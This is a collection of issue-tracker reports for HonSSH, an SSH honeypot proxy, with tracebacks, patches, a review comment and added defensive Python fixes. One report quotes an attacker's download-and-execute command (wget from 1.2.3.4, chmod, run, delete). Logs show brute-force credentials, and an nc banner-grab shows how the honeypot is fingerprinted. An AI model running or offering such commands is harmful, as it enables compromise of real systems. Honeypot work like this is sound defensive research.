there is no way to send email without SMTP auth (kippo validates the
existence of the username and password variables), so I introduced a new variable
ust_smtpauth to honssh.cfg and made a small change. I also fixed a small typo in
the email exception handling.
--- output.py.orig 2014-06-20 10:04:35.000000000 +0200
+++ output.py 2014-06-20 10:17:24.000000000 +0200
@@ -269,11 +269,12 @@
s.ehlo()
if self.cfg.get('email', 'use_tls') == 'true':
s.starttls()
- s.login(self.cfg.get('email', 'username'),
self.cfg.get('email', 'password'))
+ if (self.cfg.get('email', 'use_smtpauth')):
+ s.login(self.cfg.get('email', 'username'),
self.cfg.get('email', 'password'))
s.sendmail(msg['From'], msg['To'].split(','), msg.as_string())
s.quit() #End send mail code
except Exception, ex:
- log.msg('[OUTPUT][EMAIL][ERR] - ' + str(e))
+ log.msg('[OUTPUT][EMAIL][ERR] - ' + str(ex))
def wget(self, wgetCommand, link, fileOut):
sp = subprocess.Popen(wgetCommand, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
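Review bot: the added line "if (self.cfg.get('email', 'use_smtpauth')):" tests a configuration string for truthiness, so any non-empty value, including false, still calls s.login(); compare it the way the use_tls line just above does, i.e. "if self.cfg.get('email', 'use_smtpauth') == 'true':". The key name should also agree with the one the description introduces (ust_smtpauth there, use_smtpauth in the hunk). If self.cfg is a ConfigParser, reading a key that an existing honssh.cfg does not define raises NoOptionError inside this try block, so older configs would start reporting an email error instead of keeping the previous behaviour; a has_option check before the get would avoid that. The str(e) to str(ex) change is correct, since the except clause binds ex.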
Cheers,
Pawel
Original issue reported on code.google.com by [email protected]
on 20 Jun 2014 at 8:27
:)
Original issue reported on code.google.com by [email protected]
on 14 Sep 2014 at 5:50
Add an option to email after every successful login.
ETA: April 5th
Original issue reported on code.google.com by [email protected]
on 30 Mar 2014 at 5:21
What steps will reproduce the problem?
1.
2.
3.
What is the expected output? What do you see instead?
What version of the product are you using? On what operating system?
Please provide any additional information below.
Original issue reported on code.google.com by [email protected]
on 3 Mar 2014 at 8:23
Just a little enhancement idea: add an option to the .cfg to log all
SSH messages and not only the unknown ones, like you accidentally did in client.py
in commit 8c6edd0779f4
Original issue reported on code.google.com by [email protected]
on 1 Mar 2014 at 6:09
No email notification of an attack once an EXEC session has finished.
Original issue reported on code.google.com by [email protected]
on 29 Apr 2014 at 9:14
This ticket is only created as a quick reminder for you.
The file 'honssh/requirements' has been pushed with 0755 permissions, maybe it
should be 0644 instead?
Original issue reported on code.google.com by bifrozt.development
on 8 Jun 2014 at 11:46
What steps will reproduce the problem?
Not quite sure, it appears to be intermittent.
It's occurring during connections from different attackers, but not on every
connection. The only common denominator is that in all of the instances where this
occurs, the attack is coming from a Chinese-based IP address.
What is the expected output?
Not seeing these errors? :P
What do you see instead?
Traceback (most recent call last):
File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 84, in callWithLogger
return callWithContext({"system": lp}, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 69, in callWithContext
return context.call({ILogContext: newCtx}, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
return self.currentContext().callWithContext(ctx, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
return func(*args,**kw)
--- <exception caught here> ---
File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 586, in _doReadOrWrite
why = selectable.doRead()
File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 199, in doRead
rval = self.protocol.dataReceived(data)
File "/usr/lib/python2.7/dist-packages/twisted/conch/ssh/transport.py", line 438, in dataReceived
self.dispatchMessage(messageNum, packet[1:])
File "/opt/honssh/honssh/server.py", line 216, in dispatchMessage
self.client.sendPacket(messageNum, payload)
exceptions.AttributeError: HonsshServerTransport instance has no attribute 'client'
What version of the product are you using?
46d8a98155cc
On what operating system?
Ubuntu server 12.04
Please provide any additional information below.
I've added a log file containing all the errors.
I might be wrong, but I think we saw this error before?
Let me know if you want the adv-logs as well.
//Are
Original issue reported on code.google.com by [email protected]
on 10 Aug 2014 at 1:15
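The AttributeError in the traceback above is a race: dispatchMessage forwards every attacker packet to self.client, which is only assigned once the gateway's outbound connection to the honeypot is up, and a fast peer can send its first packet before that. The following is an added example and not HonSSH's server.py (the class and method names only mirror the traceback): the attacker-facing side buffers packets while client is None, flushes them in order when the honeypot side connects, and bounds the buffer so a peer cannot make the gateway hold an unlimited backlog. RecordingClient and the sample packets are constructed stand-ins.

```python
from collections import deque

# Constructed sample packets: an attacker's first post-key-exchange messages
# (SSH_MSG_SERVICE_REQUEST, then SSH_MSG_USERAUTH_REQUEST with method "none")
# arriving before the outbound connection to the honeypot exists.
SAMPLE_PACKETS = [
    (5, b"\x00\x00\x00\x0cssh-userauth"),
    (50, b"\x00\x00\x00\x04root\x00\x00\x00\x0essh-connection\x00\x00\x00\x04none"),
]


class RecordingClient:
    """Stand-in for the honeypot-side transport: records what it was asked to send."""

    def __init__(self):
        self.sent = []

    def sendPacket(self, messageNum, payload):
        self.sent.append((messageNum, payload))


class ForwardingServer:
    """Attacker-facing transport that never dereferences a missing client.

    `client` starts as None, which is the state the traceback shows when the
    first attacker packet arrives; dispatchMessage buffers instead of raising,
    and client_connected flushes the buffer in arrival order.
    """

    MAX_PENDING = 64   # packets held while the honeypot side is not yet up

    def __init__(self):
        self.client = None
        self.pending = deque()
        self.dropped = 0

    def dispatchMessage(self, messageNum, payload):
        if self.client is not None:
            self.client.sendPacket(messageNum, payload)
        elif len(self.pending) < self.MAX_PENDING:
            self.pending.append((messageNum, payload))
        else:
            self.dropped += 1   # over budget: count it rather than grow without bound

    def client_connected(self, client):
        self.client = client
        while self.pending:
            self.client.sendPacket(*self.pending.popleft())

    def client_lost(self):
        # the honeypot side went away; later packets buffer again (or are dropped)
        self.client = None


def simulate_race(packets=SAMPLE_PACKETS):
    """Deliver packets before the client exists, then attach it; return what it sent."""
    server = ForwardingServer()
    for num, payload in packets:
        server.dispatchMessage(num, payload)
    client = RecordingClient()
    server.client_connected(client)
    return client.sent


def simulate_overflow(extra=3):
    """Fill the buffer past MAX_PENDING; return (buffered, dropped, sent_after_connect)."""
    server = ForwardingServer()
    for _ in range(ForwardingServer.MAX_PENDING + extra):
        server.dispatchMessage(2, b"ignore")
    buffered, dropped = len(server.pending), server.dropped
    client = RecordingClient()
    server.client_connected(client)
    return buffered, dropped, len(client.sent)


if __name__ == "__main__":
    print(simulate_race())
    print(simulate_overflow())
```

In a Twisted deployment the same guard belongs wherever the outbound connection callback assigns the client transport; the important property is that the attacker side has no code path that touches client before that assignment.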
To fix.
Original issue reported on code.google.com by [email protected]
on 31 May 2014 at 8:37
What steps will reproduce the problem?
1. The honssh.log reaches the point where it should be rotated and a new
logfile created
2. When the old log file is moved to honssh.log.1 and a new honssh.log is
created, its permissions seem to be set to 0600
What is the expected output?
Expected log file permissions to be 0640 or 0644
What do you see instead?
Log file permissions are set to 0600
What version of the product are you using?
56dfab7e24f1
On what operating system?
OpenBSD 5.3/5.4
Please provide any additional information below.
Original issue reported on code.google.com by [email protected]
on 25 Mar 2014 at 9:12
When an unknown packet arrives before the client has logged in, the current honssh
crashes, because the session log is not available:
2014-03-02 06:46:52+0100 [Uninitialized] New client connection
2014-03-02 06:46:52+0100 [HonsshClientTransport,client] kex alg, key alg:
diffie-hellman-group-exchange-sha1 ssh-rsa
2014-03-02 06:46:52+0100 [HonsshClientTransport,client] outgoing: aes256-ctr
hmac-sha1 none
2014-03-02 06:46:52+0100 [HonsshClientTransport,client] incoming: aes256-ctr
hmac-sha1 none
2014-03-02 06:46:52+0100 [HonsshClientTransport,client] REVERSE
2014-03-02 06:46:52+0100 [HonsshClientTransport,client] NEW KEYS
2014-03-02 06:46:52+0100 [HonsshClientTransport,client] Client Connection
Secured
2014-03-02 06:46:53+0100 [HonsshServerTransport,8,183.44.100.88] kex alg, key
alg: diffie-hellman-group1-sha1 ssh-rsa
2014-03-02 06:46:53+0100 [HonsshServerTransport,8,183.44.100.88] outgoing:
aes256-ctr hmac-sha1 none
2014-03-02 06:46:53+0100 [HonsshServerTransport,8,183.44.100.88] incoming:
aes256-ctr hmac-sha1 none
2014-03-02 06:46:53+0100 [HonsshServerTransport,8,183.44.100.88] NEW KEYS
2014-03-02 06:46:53+0100 [HonsshServerTransport,8,183.44.100.88] SERVER:
MessageNum: 5 Encrypted '\x00\x00\x00\x0cssh-userauth'
2014-03-02 06:46:53+0100 [HonsshClientTransport,client] CLIENT: MessageNum: 6
Encrypted '\x00\x00\x00\x0cssh-userauth'
2014-03-02 06:46:53+0100 [HonsshServerTransport,8,183.44.100.88] SERVER:
MessageNum: 50 Encrypted
'\x00\x00\x00\x04root\x00\x00\x00\x0essh-connection\x00\x00\x00\x04none'
2014-03-02 06:46:53+0100 [HonsshClientTransport,client] CLIENT: MessageNum: 51
Encrypted '\x00\x00\x00\x12publickey,password\x00'
2014-03-02 06:46:54+0100 [HonsshServerTransport,8,183.44.100.88] SERVER:
MessageNum: 50 Encrypted
'\x00\x00\x00\x04root\x00\x00\x00\x0essh-connection\x00\x00\x00\x08password\x00\
x00\x00\x00\x06123456'
2014-03-02 06:46:54+0100 [HonsshServerTransport,8,183.44.100.88] Unhandled Error
Traceback (most recent call last):
File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 88, in callWithLogger
return callWithContext({"system": lp}, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 73, in callWithContext
return context.call({ILogContext: newCtx}, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
return self.currentContext().callWithContext(ctx, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
return func(*args,**kw)
--- <exception caught here> ---
File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 614, in _doReadOrWrite
why = selectable.doRead()
File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 215, in doRead
return self._dataReceived(data)
File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 221, in _dataReceived
rval = self.protocol.dataReceived(data)
File "/usr/lib/python2.7/dist-packages/twisted/conch/ssh/transport.py", line 438, in dataReceived
self.dispatchMessage(messageNum, packet[1:])
File "/home/hooster/honssh/honssh/server.py", line 187, in dispatchMessage
txtlog.log(self.txtlog_file, "Unknown SSH Packet detected - Please raise a HonSSH issue on google code with the details: %s - %s" % (str(messageNum), repr(payload)))
File "/home/hooster/honssh/honssh/txtlog.py", line 40, in log
f = file(logfile, 'a')
exceptions.IOError: [Errno 2] No such file or directory: 'sessions/183.44.100.88/20140302_064652.log'
2014-03-02 06:46:54+0100 [HonsshServerTransport,8,183.44.100.88] connection lost
Original issue reported on code.google.com by [email protected]
on 2 Mar 2014 at 11:02
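The traceback above shows txtlog.log opening sessions/<ip>/<start-time>.log in append mode before anything has created that directory, because the unknown-packet path runs before the login path that normally creates it. The following is an added example and not HonSSH's txtlog: a per-connection log that creates its directory on first write, validates the peer address before using it as a path component, and records an unhandled message number with its payload escaped. The peer address, message number and payload are constructed.

```python
import datetime
import ipaddress
import os
import tempfile


class SessionLog:
    """Per-connection text log under <base_dir>/<peer-ip>/<start-time>.log.

    The directory is created on the first write, so logging is safe at any
    point in the connection, including for an unexpected packet that arrives
    before authentication.
    """

    def __init__(self, base_dir, peer_ip, started):
        ipaddress.ip_address(peer_ip)   # raises ValueError; keeps '../' out of the path
        self.path = os.path.join(base_dir, peer_ip, started.strftime("%Y%m%d_%H%M%S") + ".log")

    def log(self, message, now=None):
        now = now or datetime.datetime.now()
        os.makedirs(os.path.dirname(self.path), exist_ok=True)
        with open(self.path, "a", encoding="utf-8") as f:
            f.write("%s - %s\n" % (now.strftime("%Y-%m-%d %H:%M:%S"), message))

    def lines(self):
        if not os.path.exists(self.path):
            return []
        with open(self.path, encoding="utf-8") as f:
            return f.read().splitlines()


def log_unknown_packet(session, messageNum, payload, now=None):
    """Record an SSH message the proxy does not handle; repr() keeps the bytes escaped."""
    session.log("Unknown SSH Packet detected - %d - %r" % (messageNum, payload), now)


def demo():
    """Replay the situation from the traceback in a temporary sessions directory."""
    base = tempfile.mkdtemp(prefix="honssh-sessions-")
    started = datetime.datetime(2014, 3, 2, 6, 46, 52)
    session = SessionLog(base, "192.0.2.10", started)   # constructed peer address
    # an unhandled message number with a constructed payload, before any login
    log_unknown_packet(session, 210, b"\x00\x00\x00\x01x", now=started)
    return session.lines()


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Writing the payload with repr() rather than raw keeps control characters and non-UTF-8 bytes out of the log file while still preserving them for later analysis.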
Hello. Can you help me with the e-mail alerting feature please? I have activated
this feature in the config file. And I have entered the data about my SMTP server and
mail account too. But after SSH login the e-mail is not sent. honssh.log does not
contain any information about this failure. I use version 1.2.2 and Debian 7.4.
Thank you for replies.
Original issue reported on code.google.com by [email protected]
on 27 Mar 2014 at 10:19
Allow attackers to manipulate files by SFTP (currently disabled)
Parse and log all activity.
ETA: ???
Original issue reported on code.google.com by [email protected]
on 30 Mar 2014 at 5:34
Starting honssh in background...
2013-09-30 21:36:52+0800 [-] Log opened.
2013-09-30 21:36:52+0800 [-] Traceback (most recent call last):
2013-09-30 21:36:52+0800 [-] File
"/usr/lib/python2.7/dist-packages/twisted/application/app.py", line 462, in
getApplication
2013-09-30 21:36:52+0800 [-] application =
service.loadApplication(filename, style, passphrase)
2013-09-30 21:36:52+0800 [-] File
"/usr/lib/python2.7/dist-packages/twisted/application/service.py", line 405, in
loadApplication
2013-09-30 21:36:52+0800 [-] application = sob.loadValueFromFile(filename,
'application', passphrase)
2013-09-30 21:36:52+0800 [-] File
"/usr/lib/python2.7/dist-packages/twisted/persisted/sob.py", line 210, in
loadValueFromFile
2013-09-30 21:36:52+0800 [-] exec fileObj in d, d
2013-09-30 21:36:52+0800 [-] File "honssh.tac", line 53, in <module>
2013-09-30 21:36:52+0800 [-] with open(cfg.get('honeypot', 'private_key'))
as privateBlobFile:
2013-09-30 21:36:52+0800 [-] IOError: [Errno 2] No such file or directory:
'id_rsa'
2013-09-30 21:36:52+0800 [-] Failed to load application: [Errno 2] No such file
or directory: 'id_rsa'
2013-09-30 21:36:52+0800 [-] Unhandled Error
Traceback (most recent call last):
File "/usr/lib/python2.7/dist-packages/twisted/application/app.py", line 652, in run
runApp(config)
File "/usr/lib/python2.7/dist-packages/twisted/scripts/twistd.py", line 23, in runApp
_SomeApplicationRunner(config).run()
File "/usr/lib/python2.7/dist-packages/twisted/application/app.py", line 386, in run
self.application = self.createOrGetApplication()
File "/usr/lib/python2.7/dist-packages/twisted/application/app.py", line 451, in createOrGetApplication
application = getApplication(self.config, passphrase)
--- <exception caught here> ---
File "/usr/lib/python2.7/dist-packages/twisted/application/app.py", line 462, in getApplication
application = service.loadApplication(filename, style, passphrase)
File "/usr/lib/python2.7/dist-packages/twisted/application/service.py", line 405, in loadApplication
application = sob.loadValueFromFile(filename, 'application', passphrase)
File "/usr/lib/python2.7/dist-packages/twisted/persisted/sob.py", line 210, in loadValueFromFile
exec fileObj in d, d
File "honssh.tac", line 53, in <module>
with open(cfg.get('honeypot', 'private_key')) as privateBlobFile:
exceptions.IOError: [Errno 2] No such file or directory: 'id_rsa'
Failed to load application: [Errno 2] No such file or directory: 'id_rsa'
in Ubuntu 12.04
Original issue reported on code.google.com by [email protected]
on 30 Sep 2013 at 1:37
What steps will reproduce the problem?
Not sure; during the last 10-11 days I've only seen this happen twice.
What is the expected output?
Normal log entries(?)
What do you see instead?
2014-03-12 05:26:37+0100 [HonsshServerTransport,1376,pesky.ip.add.ress] Unhandled Error
Traceback (most recent call last):
File "/usr/local/lib/python2.7/site-packages/twisted/python/log.py", line 84, in callWithLogger
return callWithContext({"system": lp}, func, *args, **kw)
File "/usr/local/lib/python2.7/site-packages/twisted/python/log.py", line 69, in callWithContext
return context.call({ILogContext: newCtx}, func, *args, **kw)
File "/usr/local/lib/python2.7/site-packages/twisted/python/context.py", line 118, in callWithContext
return self.currentContext().callWithContext(ctx, func, *args, **kw)
File "/usr/local/lib/python2.7/site-packages/twisted/python/context.py", line 81, in callWithContext
return func(*args,**kw)
--- <exception caught here> ---
File "/usr/local/lib/python2.7/site-packages/twisted/internet/posixbase.py", line 581, in _doReadOrWrite
why = selectable.doRead()
File "/usr/local/lib/python2.7/site-packages/twisted/internet/tcp.py", line 199, in doRead
rval = self.protocol.dataReceived(data)
File "/usr/local/lib/python2.7/site-packages/twisted/conch/ssh/transport.py", line 438, in dataReceived
self.dispatchMessage(messageNum, packet[1:])
File "/HONEY/honssh/server.py", line 201, in dispatchMessage
self.client.sendPacket(messageNum, payload)
exceptions.AttributeError: HonsshServerTransport instance has no attribute 'client'
2014-03-12 05:26:37+0100 [HonsshServerTransport,1376,pesky.ip.add.ress] connection lost
What version of the product are you using?
b9880b4e367b
On what operating system?
OpenBSD 5.4
Please provide any additional information below.
Totally forgot to enable advanced logging, doing that now and including it if
it happens again :)
Original issue reported on code.google.com by [email protected]
on 12 Mar 2014 at 6:48
What steps will reproduce the problem?
It looks like it's possible to fingerprint HonSSH through banner grabbing.
What is the expected output?
$ nc -v blacks.sshserver.com 22
Connection to blacks.sshserver.com 22 port [tcp/ssh] succeeded!
SSH-2.0-OpenSSH_6.3
What do you see instead?
$ nc -v blacks.trollpot.com 22
Connection to blacks.trollpot.com 22 port [tcp/ssh] succeeded!
SSH-2.0-OpenSSH_6.3
����;���������G@;�$��diffie-hellman-group1-sha1ssh-rsa�aes256-ctr,aes256-cbc,aes192-ctr,aes192-cbc,aes128-ctr,aes128-cbc,cast128-ctr,cast128-cbc,blowfish-ctr,blowfish-cbc,3des-ctr,3des-cbc�aes256-ctr,aes256-cbc,aes192-ctr,aes192-cbc,aes128-ctr,aes128-cbc,cast128-ctr,cast128-cbc,blowfish-ctr,blowfish-cbc,3des-ctr,3des-cbc�hmac-sha1,hmac-md5�hmac-sha1,hmac-md5none,zlib none,zlibA(&
What version of the product are you using?
b9880b4e367b
On what operating system?
All of them, I guess?
Please provide any additional information below.
It looks to me that HonSSH is using the version string (ssh debug level 1)
as well as the kex_parse_kexinit (ssh debug level 2). Is it possible to
make HonSSH be less verbose/prevent it from dumping too much information?
Cheers,
B
Original issue reported on code.google.com by [email protected]
on 16 Mar 2014 at 4:40
What steps will reproduce the problem?
1. The attacker logs in and downloads a file.
What is the expected behavior?
All files that are downloaded to the honeypot are also downloaded by HonSSH.
What do you see instead?
Only some files are downloaded, others are not.
What version of the product are you using?
56dfab7e24f1
On what operating system?
OpenBSD 5.3/5.4
Please provide any additional information below.
This is the first time I've noticed this. Two files were downloaded to the
honeypot today; the only difference I can see between the two download events
is the port the attacker connects to on the malware hosting server,
HTTP on port 6666 in this case. If this is the case it's not consistent either,
as HonSSH has managed to do this before.
Adding log, adv-log and tty. Enjoy! :)
Original issue reported on code.google.com by [email protected]
on 26 Mar 2014 at 10:32
What steps will reproduce the problem?
And so...it returns :)
What is the expected output?
Normal log entries(?)
What do you see instead?
2014-03-21 12:41:37+0100 [honssh.server.HonsshServerFactory] Starting factory <honssh.client.HonsshClientFactory instance at 0x1fcbd4d5998>
2014-03-21 12:41:37+0100 [HonsshServerTransport,218,193.17.184.197] Unhandled Error
Traceback (most recent call last):
File "/usr/local/lib/python2.7/site-packages/twisted/application/app.py", line 323, in runReactorWithLogging
reactor.run()
File "/usr/local/lib/python2.7/site-packages/twisted/internet/base.py", line 1169, in run
self.mainLoop()
File "/usr/local/lib/python2.7/site-packages/twisted/internet/base.py", line 1181, in mainLoop
self.doIteration(t)
File "/usr/local/lib/python2.7/site-packages/twisted/internet/pollreactor.py", line 167, in doPoll
log.callWithLogger(selectable, _drdw, selectable, fd, event)
--- <exception caught here> ---
File "/usr/local/lib/python2.7/site-packages/twisted/python/log.py", line 84, in callWithLogger
return callWithContext({"system": lp}, func, *args, **kw)
File "/usr/local/lib/python2.7/site-packages/twisted/python/log.py", line 69, in callWithContext
return context.call({ILogContext: newCtx}, func, *args, **kw)
File "/usr/local/lib/python2.7/site-packages/twisted/python/context.py", line 118, in callWithContext
return self.currentContext().callWithContext(ctx, func, *args, **kw)
File "/usr/local/lib/python2.7/site-packages/twisted/python/context.py", line 81, in callWithContext
return func(*args,**kw)
File "/usr/local/lib/python2.7/site-packages/twisted/internet/posixbase.py", line 594, in _doReadOrWrite
self._disconnectSelectable(selectable, why, inRead)
File "/usr/local/lib/python2.7/site-packages/twisted/internet/posixbase.py", line 260, in _disconnectSelectable
selectable.readConnectionLost(f)
File "/usr/local/lib/python2.7/site-packages/twisted/internet/tcp.py", line 257, in readConnectionLost
self.connectionLost(reason)
File "/usr/local/lib/python2.7/site-packages/twisted/internet/tcp.py", line 277, in connectionLost
protocol.connectionLost(reason)
File "/HONEY/honssh/server.py", line 73, in connectionLost
self.client.loseConnection()
exceptions.AttributeError: HonsshServerTransport instance has no attribute 'client'
2014-03-21 12:41:37+0100 [Uninitialized] New client connection
2014-03-21 12:41:37+0100 [HonsshClientTransport,client] kex alg, key alg: diffie-hellman-group-exchange-sha1 ssh-rsa
2014-03-21 12:41:37+0100 [HonsshClientTransport,client] outgoing: aes256-ctr hmac-sha1 none
2014-03-21 12:41:37+0100 [HonsshClientTransport,client] incoming: aes256-ctr hmac-sha1 none
2014-03-21 12:41:37+0100 [HonsshClientTransport,client] REVERSE
2014-03-21 12:41:37+0100 [HonsshClientTransport,client] NEW KEYS
2014-03-21 12:41:37+0100 [HonsshClientTransport,client] Client Connection Secured
2014-03-21 12:42:37+0100 [HonsshClientTransport,client] connection lost
2014-03-21 12:42:37+0100 [HonsshClientTransport,client] Stopping factory <honssh.client.HonsshClientFactory instance at 0x1fcbd4d5998>
What version of the product are you using?
56dfab7e24f1
On what operating system?
OpenBSD 5.3/5.4 amd64
Please provide any additional information below
I have advanced logging enabled this time, but this incident did not generate
any logs at all.
The log snippet I included here is the only data I can provide you with - sorry.
Original issue reported on code.google.com by [email protected]
on 21 Mar 2014 at 11:58
What steps will reproduce the problem?
Not sure what causes this issue or if it's working as intended, but I've noticed
this showing up in a lot of session logs lately.
Unknown SSH Packet detected - Please raise a HonSSH issue on google code with
the details: CLIENT 100 - '\x00\x00\x01\x00'
What version of the product are you using? On what operating system?
b9880b4e367b
Original issue reported on code.google.com by [email protected]
on 10 Mar 2014 at 10:34
Got some unknown SSH packets tonight:
Unknown SSH Packet detected - Please raise a HonSSH issue on google code with
the details: 2 -
Unknown SSH Packet detected - Please raise a HonSSH issue on google code with
the details: 20 -
Unknown SSH Packet detected - Please raise a HonSSH issue on google code with
the details: 20 -
Unknown SSH Packet detected - Please raise a HonSSH issue on google code with
the details: 30 - '\x00\x00\x10\x00'
Unknown SSH Packet detected - Please raise a HonSSH issue on google code with
the details: 31 -
Unknown SSH Packet detected - Please raise a HonSSH issue on google code with
the details: 32 -
Unknown SSH Packet detected - Please raise a HonSSH issue on google code with
the details: 33 -
Unknown SSH Packet detected - Please raise a HonSSH issue on google code with
the details: 21 - ''
Original issue reported on code.google.com by [email protected]
on 2 Mar 2014 at 10:46
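A decoder for the message numbers in these "Unknown SSH Packet" entries (this report and the earlier "CLIENT 100" one), added here as an example; it is not HonSSH code. It names each number, resolving the 30-34 range by the negotiated kex algorithm because the plain DH and group-exchange methods share those numbers, parses a KEXINIT payload into its ten name-lists, and flags legacy algorithms a front-end should not be advertising. The KEXINIT bytes are constructed inline from algorithm names like those quoted in the log, with a fixed cookie instead of 16 random bytes.

```python
import struct

# Message numbers behind the 'Unknown SSH Packet' entries above (RFC 4253
# transport layer, RFC 4419 DH group exchange, RFC 4254 channel messages).
SSH_MSG_NAMES = {2: "SSH_MSG_IGNORE", 20: "SSH_MSG_KEXINIT", 21: "SSH_MSG_NEWKEYS",
                 98: "SSH_MSG_CHANNEL_REQUEST", 99: "SSH_MSG_CHANNEL_SUCCESS",
                 100: "SSH_MSG_CHANNEL_FAILURE"}
# 30-34 are reused by every kex method; the negotiated kex algorithm decides.
GEX_MSG_NAMES = {30: "SSH_MSG_KEX_DH_GEX_REQUEST_OLD", 31: "SSH_MSG_KEX_DH_GEX_GROUP",
                 32: "SSH_MSG_KEX_DH_GEX_INIT", 33: "SSH_MSG_KEX_DH_GEX_REPLY",
                 34: "SSH_MSG_KEX_DH_GEX_REQUEST"}
DH_MSG_NAMES = {30: "SSH_MSG_KEXDH_INIT", 31: "SSH_MSG_KEXDH_REPLY"}
# The ten name-lists of SSH_MSG_KEXINIT in wire order (RFC 4253 section 7.1).
KEXINIT_LISTS = ("kex_algorithms", "server_host_key_algorithms",
                 "encryption_client_to_server", "encryption_server_to_client",
                 "mac_client_to_server", "mac_server_to_client",
                 "compression_client_to_server", "compression_server_to_client",
                 "languages_client_to_server", "languages_server_to_client")
# Long-deprecated algorithms; a front-end still offering them stands out from
# the OpenSSH version its banner claims.
LEGACY_ALGORITHMS = {"diffie-hellman-group1-sha1", "ssh-dss", "arcfour", "arcfour128",
                     "arcfour256", "3des-cbc", "blowfish-cbc", "hmac-md5",
                     "hmac-md5-96", "hmac-sha1-96"}


def message_name(num, kex_alg=None):
    """RFC name of a message number; kex_alg resolves the shared 30-34 range."""
    if num in SSH_MSG_NAMES:
        return SSH_MSG_NAMES[num]
    if kex_alg and kex_alg.startswith("diffie-hellman-group-exchange-"):
        return GEX_MSG_NAMES.get(num, "UNKNOWN")
    return DH_MSG_NAMES.get(num, "UNKNOWN")


def read_namelist(buf, off):
    """Read an SSH string (uint32 length + bytes) holding a comma-separated name-list."""
    if off + 4 > len(buf):
        raise ValueError("truncated name-list length at offset %d" % off)
    (length,) = struct.unpack_from(">I", buf, off)
    raw = buf[off + 4:off + 4 + length]
    if len(raw) != length:
        raise ValueError("truncated name-list at offset %d" % off)
    return [n for n in raw.decode("ascii").split(",") if n], off + 4 + length


def parse_kexinit(payload):
    """Decode the bytes HonSSH logs after the message-number byte of a KEXINIT."""
    if len(payload) < 16:
        raise ValueError("KEXINIT shorter than its 16-byte cookie")
    fields, off = {"cookie": payload[:16].hex()}, 16
    for name in KEXINIT_LISTS:
        fields[name], off = read_namelist(payload, off)
    if len(payload) - off != 5:  # boolean first_kex_packet_follows + uint32 reserved
        raise ValueError("expected 5 trailing bytes, found %d" % (len(payload) - off))
    fields["first_kex_packet_follows"] = bool(payload[off])
    (fields["reserved"],) = struct.unpack_from(">I", payload, off + 1)
    return fields


def build_kexinit(cookie, lists):
    """Inverse of parse_kexinit; used below to construct a sample packet."""
    out = bytearray(cookie)
    for name in KEXINIT_LISTS:
        raw = ",".join(lists.get(name, [])).encode("ascii")
        out += struct.pack(">I", len(raw)) + raw
    return bytes(out + b"\x00" + struct.pack(">I", 0))


def legacy_algorithms(fields):
    """Deprecated names offered in any of the ten lists, sorted."""
    found = set()
    for name in KEXINIT_LISTS:
        found.update(set(fields[name]) & LEGACY_ALGORITHMS)
    return sorted(found)


def describe(num, payload, kex_alg=None):
    """Turn one logged (number, payload) pair into a name and decoded fields."""
    name = message_name(num, kex_alg)
    if num == 20:
        return name, parse_kexinit(payload)
    if name == "SSH_MSG_KEX_DH_GEX_REQUEST_OLD" and len(payload) == 4:
        return name, {"n": struct.unpack(">I", payload)[0]}  # requested group bits
    if num in (99, 100) and len(payload) == 4:
        return name, {"recipient_channel": struct.unpack(">I", payload)[0]}
    return name, ({} if num == 21 else {"length": len(payload)})


# Constructed sample: lists modelled on the KEXINIT quoted above, fixed cookie
# instead of 16 random bytes.
_CIPHERS = ["aes256-ctr", "aes128-cbc", "arcfour128"]
_MACS = ["hmac-sha2-256", "hmac-sha1", "hmac-md5"]
SAMPLE_LISTS = {
    "kex_algorithms": ["diffie-hellman-group-exchange-sha256",
                       "diffie-hellman-group14-sha1", "diffie-hellman-group1-sha1"],
    "server_host_key_algorithms": ["ssh-rsa", "ssh-dss"],
    "encryption_client_to_server": _CIPHERS, "encryption_server_to_client": _CIPHERS,
    "mac_client_to_server": _MACS, "mac_server_to_client": _MACS,
    "compression_client_to_server": ["none", "zlib"],
    "compression_server_to_client": ["none", "zlib"],
}
SAMPLE_KEXINIT = build_kexinit(b"\x01" * 16, SAMPLE_LISTS)
```

With the group-exchange kex negotiated, the logged `30 - '\x00\x00\x10\x00'` decodes as a request for a 4096-bit group, and `CLIENT 100 - '\x00\x00\x01\x00'` as a channel failure for recipient channel 256.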
What steps will reproduce the problem?
1.
The attacker logs in to verify the user/passwd combination and disconnects
immediately. (Possibly ctrl+d)
What is the expected behavior?
When HonSSH detects a new TTY log it should be sent using the mail function.
What behavior do you see instead?
The absence of these logs being sent.
What version of the product are you using?
56dfab7e24f1
On what operating system?
OpenBSD 5.3 amd64/5.4 amd64
Please provide any additional information below.
Don't know if this is working as intended.
It's not really a big issue whether or not I receive empty TTY logs :)
It looks to be working as long as the attacker enters at least one command.
Cheers,
B
Original issue reported on code.google.com by [email protected]
on 19 Mar 2014 at 5:49
If the attacker logs on to the honeypot and downloads a file using a "copy paste
command" containing a semicolon directly after the file name, it will not be
downloaded by HonSSH.
Example command:
wget http://1.2.3.4/FILENAME;chmod 777 FILENAME;./FILENAME;rm -rf FILENAME;
What version of the product are you using?
81dafaef5630
On what operating system?
Ubuntu 12.04 LTS
Original issue reported on code.google.com by [email protected]
on 17 Feb 2014 at 5:27
What steps will reproduce the problem?
1. When.
During a failed bruteforce attack
2. How to reproduce.
Attempt to login with wrong credentials
What is the expected output?
A honssh.log without any error messages.
What do you see instead?
After the attacker has failed to authenticate and disconnects, you will see
this error in the honssh.log:
"""
2014-06-03 12:13:35+0200 [HonsshServerTransport,1,1.2.3.4] [OUTPUT] Lost connection with the attacker: 1.2.3.4
